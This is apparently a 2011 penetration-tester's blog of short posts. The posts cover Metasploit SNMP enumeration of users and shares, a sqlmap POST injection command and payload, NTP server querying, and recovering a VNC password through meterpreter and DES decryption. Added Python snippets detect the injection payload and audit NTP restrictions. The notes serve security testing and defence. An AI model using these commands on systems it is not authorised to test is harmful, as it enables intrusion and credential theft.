Wednesday, March 23, 2011

New SNMP Metasploit Modules

My new favorite modules (for today) are the snmp_enumusers and snmp_enumshares modules, which work against Windows hosts that have SNMP running.

msf > use auxiliary/scanner/snmp/
use auxiliary/scanner/snmp/aix_version
use auxiliary/scanner/snmp/cisco_config_tftp
use auxiliary/scanner/snmp/cisco_upload_file
use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/snmp/snmp_enumshares
use auxiliary/scanner/snmp/snmp_enumusers
use auxiliary/scanner/snmp/snmp_login
use auxiliary/scanner/snmp/snmp_set


msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > set RHOSTS 192.168.100.119
RHOSTS => 192.168.100.119
msf auxiliary(snmp_login) > run

[+] SNMP: 192.168.100.119 community string: 'public' info: 'Hardware: x86 Family 6 Model 23 Stepping 6 AT/AT COMPATIBLE - Software: Windows Version 5.2 (Build 3790 Multiprocessor Free)'
[+] SNMP: 192.168.100.119 community string: 'private' info: 'Hardware: x86 Family 6 Model 23 Stepping 6 AT/AT COMPATIBLE - Software: Windows Version 5.2 (Build 3790 Multiprocessor Free)'
[*] Validating scan results from 1 hosts...
[*] Host 192.168.100.119 provides READ-WRITE access with community 'private'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


msf auxiliary(snmp_login) > use auxiliary/scanner/snmp/snmp_enumusers
msf auxiliary(snmp_enumusers) > info
...SNIP...
Description:
  This module will use LanManager OID values to enumerate local user accounts on a Windows system via SNMP

msf auxiliary(snmp_enumusers) > set RHOSTS 192.168.100.119
RHOSTS => 192.168.100.119
msf auxiliary(snmp_enumusers) > run

[+] 192.168.100.119 Found Users: ASPNET, Administrator, Guest, IUSR_SRV, IWAM_SRV, SUPPORT_388945a0
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


msf auxiliary(snmp_enumusers) > use auxiliary/scanner/snmp/snmp_enumshares
msf auxiliary(snmp_enumshares) > info
...SNIP...
Description:
  This module will use LanManager OID values to enumerate SMB shares on a Windows system via SNMP

msf auxiliary(snmp_enumshares) > set RHOSTS 192.168.100.119
RHOSTS => 192.168.100.119
msf auxiliary(snmp_enumshares) > run

[+] 192.168.100.119
    backup - (C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\backup)
    MetaInfoBack - (C:\WINDOWS\system32\inetsrv\MetaInfoBack)
    NewBackup2 - (J:\NewBackup2)
    SharepointBackup - (K:\SharepointBackup)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Monday, March 21, 2011

sqlmap with POST requests

Notes for sqlmap and POST requests since every f**king tutorial only covers GETs

Options you'll want to use:

-u URL, --url=URL     <-- Target URL
--method=METHOD       <-- HTTP method, GET or POST (default GET)
--data=DATA           <-- Data string to be sent through POST
-p TESTPARAMETER      <-- Testable parameter(s)
--prefix=PREFIX       <-- Injection payload prefix string
--postfix=POSTFIX     <-- Injection payload postfix string
--dbms=DBMS           <-- Force back-end DBMS to this value

* --dbms= if sqlmap is sucking at fingerprinting the backend on its own

We'll assume we have a simple POST request:


user@ubuntu:~/pentest/sqlmap-dev$ python sqlmap.py -u "http://192.168.1.100/fancyshmancy/login.aspx" --method POST --data "usernameTxt=blah&passwordTxt=blah&submitBtn=Log+On" -p "usernameTxt" --prefix="')" --dbms=mssql -v 2

--method to pass the POST option

--data to pass the parameters that are required for the POST

-p to pass the injectable field, so in this case the username field (usernameTxt)

--prefix to pass what needs to be sent before we can inject. We had to issue a tick ( ' ) and right parenthesis ( ) ) to close out the query

--dbms to tell it the backend was MSSQL

This yields us a sqlmap result like so:

Place: POST
Parameter: usernameTxt
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: usernameTxt=blah'); WAITFOR DELAY '0:0:5';-- AND ('yTwo'='yTwo&passwordTxt=blah&submitBtn=Log+On
---
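Seen from the other side of the wire, that payload has a recognisable shape in a captured POST body: a quote-and-paren that closes the original expression, a `;` starting a stacked query, `WAITFOR DELAY`, and a `--` comment. The following is an added example, not code from the original post: a small log/WAF check in Python that URL-decodes a form body and flags the parameter carrying those indicators. The two sample bodies are constructed (one is the payload above, the other an ordinary login).

```python
"""Added example (not from the original post): flag the time-based,
stacked-query payload shape the post's sqlmap run produced, as it would
appear in a captured POST body.  Sample bodies are constructed."""
import re
from urllib.parse import unquote_plus

# Indicators of stacked queries / time-based blind SQLi against MSSQL.
# WAITFOR DELAY is the MSSQL delay primitive the post's payload used.
INDICATORS = {
    "stacked_query": re.compile(r"['\")]\s*;"),        # quote/paren, then ';'
    "mssql_waitfor": re.compile(r"\bWAITFOR\s+DELAY\b", re.I),
    "comment_terminator": re.compile(r"--|/\*"),
    "always_true": re.compile(r"\bAND\s*\(?\s*'(\w+)'\s*=\s*'\1", re.I),
}

def split_form(body: str) -> list:
    """Split application/x-www-form-urlencoded on '&' only (never on ';',
    which older parse_qsl did and which would hide a stacked query)."""
    pairs = []
    for field in body.split("&"):
        name, _, value = field.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs

def flag_post_body(body: str) -> dict:
    """Return {param: [indicator names]} for each parameter that looks injected."""
    hits = {}
    for name, value in split_form(body):
        found = [label for label, rx in INDICATORS.items() if rx.search(value)]
        if found:
            hits[name] = found
    return hits

# Constructed samples: the post's sqlmap payload, and a normal login.
MALICIOUS = ("usernameTxt=blah'); WAITFOR DELAY '0:0:5';-- AND ('yTwo'='yTwo"
             "&passwordTxt=blah&submitBtn=Log+On")
BENIGN = "usernameTxt=alice.o'brien&passwordTxt=Correct+Horse&submitBtn=Log+On"

if __name__ == "__main__":
    for body in (MALICIOUS, BENIGN):
        print(flag_post_body(body) or "clean")
```

Note that the apostrophe in a legitimate name like o'brien alone does not trip the check; it is the quote followed by `;` that is flagged.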

Friday, March 18, 2011

I forgot my NTP stuff, so here's more notes on it

Yeah, what the title says: for some reason the NTP module wasn't working for me in Metasploit, so I had to remember how to use the NTP tools to pull some info.

Here are my notes:

http://www.eecis.udel.edu/~mills/ntp/html/ntpdc.html
ntpdc -c sysinfo 192.168.1.205
ntpdc -c monlist 192.168.1.205
ntpdc -c listpeers 192.168.1.205
ntpdc -c peers 192.168.1.205
ntpdc -c reslist 192.168.1.205


http://www.eecis.udel.edu/~mills/ntp/html/ntpq.html
ntpq 192.168.1.205
-> version
-> host
-> readlist
-> lpeers
-> hostnames
-> keytype
-> ntpversion
-> associations
-> pstatus [#]

ntpq> help
ntpq commands:
addvars       debug          lopeers         passociations  rl
associations  delay          lpassociations  passwd         rmvars
authenticate  exit           lpeers          peers          rv
cl            help           mreadlist       poll           showvars
clearvars     host           mreadvar        pstatus        timeout
clocklist     hostnames      mrl             quit           version
clockvar      keyid          mrv             raw            writelist
cooked        keytype        ntpversion      readlist       writevar
cv            lassociations  opeers          readvar
ntpq>

chris@notbt:/pentest$ ntpq 192.168.1.60
ntpq> lpeers
     remote           refid      st t when poll reach   delay   offset  jitter
==============================================================================
*computerville.wxy.suk 192.168.1.108    2 u  338 1024  377   35.327   -0.702   1.030


ntpq> version
ntpq 4.2.4p8@1.1612-o Fri Apr 9 00:28:48 UTC 2010 (1)

ntpq> host
current host is 192.168.1.60

ntpq> readlist
assID=0 status=0658 leap_none, sync_ntp, 5 events, event_8,
version="ntpd 4.2.6p2@1.2194-o Sun Oct 17 02:04:37 UTC 2010 (1)",
processor="x86_64", system="Linux/2.6.35.4-x86_64-linode16", leap=00,
stratum=3, precision=-20, rootdelay=58.612, rootdisp=86.969, refid=1.2.3.102,
reftime=d12a932f.e1697c36  Wed, Mar 16 2011  1:38:55.880,
clock=d12a98c9.eee329a7  Wed, Mar 16 2011  2:02:49.933, peer=18290,
tc=10, mintc=3, offset=-0.702, frequency=-16.787, sys_jitter=1.061,
clk_jitter=0.881, clk_wander=0.144

ntpq> hostnames
hostnames being shown

ntpq> keytype
keytype is MD5

ntpq> ntpversion
NTP version being claimed is 2

ntpq> associations
ind assID status  conf reach auth condition  last_event cnt
===========================================================
  1 18290  964a   yes   yes  none  sys.peer              4

ntpq> pstatus 18290
assID=18290 status=964a reach, conf, sel_sys.peer, 4 events, event_10,
srcadr=computerville.wxy.suk.de, srcport=123, dstadr=192.168.1.60,
dstport=123, leap=00, stratum=2, precision=-20, rootdelay=22.964,
rootdisp=33.768, refid=192.168.1.108,
reftime=d12a9360.1f34b00f  Wed, Mar 16 2011  1:39:44.121,
rec=d12a976a.e177c84f  Wed, Mar 16 2011  1:56:58.880, reach=377,
unreach=0, hmode=3, pmode=4, hpoll=10, ppoll=10, headway=0, flash=00 ok,
keyid=0, offset=-0.702, delay=35.327, dispersion=19.528, jitter=1.030,
xleave=0.050,
filtdelay=    35.56   35.33   35.47   35.69   35.81   35.42   35.38   35.58,
filtoffset=   -0.85   -0.70   -0.86   -1.42   -1.63   -1.90   -2.42   -1.97,
filtdisp=      0.00   16.25   32.00   47.93   63.45   79.40   95.69  111.96


chris@notbt:/pentest$ ntpdc -c monlist 192.168.1.60
remote address            port local address      count m ver code avgint  lstint
===============================================================================
computerville.wxy.suk.de   123 192.168.1.60        6832 4 4      90   1044     476


chris@notbt:/pentest$ ntpdc -c sysinfo 192.168.1.60
system peer:          computerville.wxy.suk.de
system peer mode:     client
leap indicator:       00
stratum:              3
precision:            -20
root distance:        0.05861 s
root dispersion:      0.08899 s
reference ID:         [1.2.3.102]
reference time:       d12a932f.e1697c36  Wed, Mar 16 2011  1:38:55.880
system flags:         auth monitor ntp kernel stats
jitter:               0.001053 s
stability:            0.000 ppm
broadcastdelay:       0.000000 s
authdelay:            0.000000 s

chris@notbt:/pentest$ ntpdc -c listpeers 192.168.1.60
client    computerville.wxy.suk.de

chris@notbt:/pentest$ ntpdc -c peers 192.168.1.60
     remote           local      st poll reach  delay   offset    disp
=======================================================================
*computerville.wxy.suk 192.168.1.60    2 1024  377 0.03532 -0.000702 0.13974

chris@notbt:/pentest$ ntpdc -c reslist 192.168.1.60
   address          mask            count        flags
=====================================================================
0.0.0.0         0.0.0.0              6846  nomodify, nopeer
some-domain     255.255.255.255         0  none
some-domain     255.255.255.255         0  ignore
osafs.org       255.255.255.255         0  ignore
::              ::                      0  nomodify, nopeer
ip6-localhost   ffff:ffff:ffff:         0  ignore
fe80::fcfd:b2ff ffff:ffff:ffff:         0  ignore
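The reslist output is the part worth reading most carefully if you run the server: the catch-all 0.0.0.0 and :: entries carry nomodify and nopeer but not noquery, which is why readlist, pstatus and monlist all answered. Below is an added example in Python, not code from the original post, that parses a reslist listing and reports which flags the catch-all entries lack. The sample text is constructed from the listing above, and the expected flag set is the commonly recommended `restrict default` set, which is an assumption of this example.

```python
"""Added example (not from the original post): parse `ntpdc -c reslist`
output and report which restriction flags the catch-all entries lack.
The sample listing is constructed to mirror the post's output."""

# Commonly recommended `restrict default` flags (assumption of this example).
# noquery is the one that denies ntpq/ntpdc queries; the post's server
# answered readlist, pstatus and monlist because its default lacks it.
EXPECTED = {"noquery", "nomodify", "nopeer", "notrap"}
CATCH_ALL = {"0.0.0.0", "::"}

def parse_reslist(text: str) -> list:
    """Turn reslist rows into dicts, skipping the header and '====' lines."""
    rows = []
    for line in text.splitlines():
        parts = line.split(None, 3)          # address, mask, count, flags
        if len(parts) < 3 or not parts[2].isdigit():
            continue                          # header, separator or blank
        flags = parts[3] if len(parts) == 4 else ""
        rows.append({
            "address": parts[0], "mask": parts[1], "count": int(parts[2]),
            "flags": {f.strip() for f in flags.split(",") if f.strip()},
        })
    return rows

def missing_default_flags(text: str) -> dict:
    """Map each catch-all address to the expected flags it does not carry."""
    return {row["address"]: EXPECTED - row["flags"]
            for row in parse_reslist(text) if row["address"] in CATCH_ALL}

# Constructed sample, abridged from the post's listing.
SAMPLE = """\
   address          mask            count        flags
=====================================================================
0.0.0.0         0.0.0.0              6846  nomodify, nopeer
some-domain     255.255.255.255         0  none
osafs.org       255.255.255.255         0  ignore
::              ::                      0  nomodify, nopeer
ip6-localhost   ffff:ffff:ffff:         0  ignore
"""

if __name__ == "__main__":
    for addr, missing in missing_default_flags(SAMPLE).items():
        print(f"{addr}: missing {', '.join(sorted(missing)) or 'nothing'}")
```

The `count` column is also telling: 6846 packets matched the catch-all entry, so whatever it permits has been exercised.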

Tuesday, March 15, 2011

VNC passwords and Metasploit and DES

Inside your meterpreter shell, run getvncpw:

meterpreter > run getvncpw
[*] Searching for VNC Passwords in the registry....
[*] FOUND in HKLM\Software\RealVNC\WinVNC4 -=> 3290e903b5bf3769 =>


You're probably asking yourself what the F kind of password 3290e... is. Well, it's DES encrypted. Lucky for us the key is hardcoded (0x238210763578887), and since VNC is open source...

code here:
http://packetstormsecurity.org/files/view/10159/vncdec.

change the relevant section:

/* put your password hash here in p[] */
char p[]={0x59,0x58,0x6e,0x10,0xa4,0x48,0xd3,0x80};

getvncpw spit out 3290e903b5bf3769, so:

char p[]={0x32,0x90,0xe9,0x03,0xb5,0xbf,0x37,0x69};

cg@segfault:~/pentest$ gcc vncdec.c -o vncdec
cg@segfault:~/pentest$ ./vncdec
demopass


Or use this one:
http://www.consume.org/~jshare/vncdec.c

where you can just put your hash on the command line and don't have to recompile every time.